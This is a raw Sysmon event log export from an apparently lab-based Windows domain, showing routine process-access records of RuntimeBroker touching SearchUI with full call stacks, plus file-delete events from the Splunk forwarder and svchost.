08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.325{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.325{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.309{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x8000000000000000810018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:38.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22BBB800026FDE5E8C11A5893A99B7AD,SHA256=97C09DC5237C7269E129873FFD25D3ED798CAF57BC94C3058A69D7D3E5724910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.660{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A33A48CB3C1622D8D40EBD18B0D9B251,SHA256=BE38A361CD09B8D250E7296313ABD3E094567BDAE197A0E2AE1B667BFAAA045C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428D670E4C2038D0318BC746CAF685A0,SHA256=D3314AF41F83E1F47D11C24AF8277887E0C9A7EF9F6A6E28A4756F7BEE00F586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:38.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99E025462A547F9C5C20E6685E17497C,SHA256=E7EA4F969AAF1D92C2A5F844902F768F0F5235ECBD414FA2963BFEA6DA04B5AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.064{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
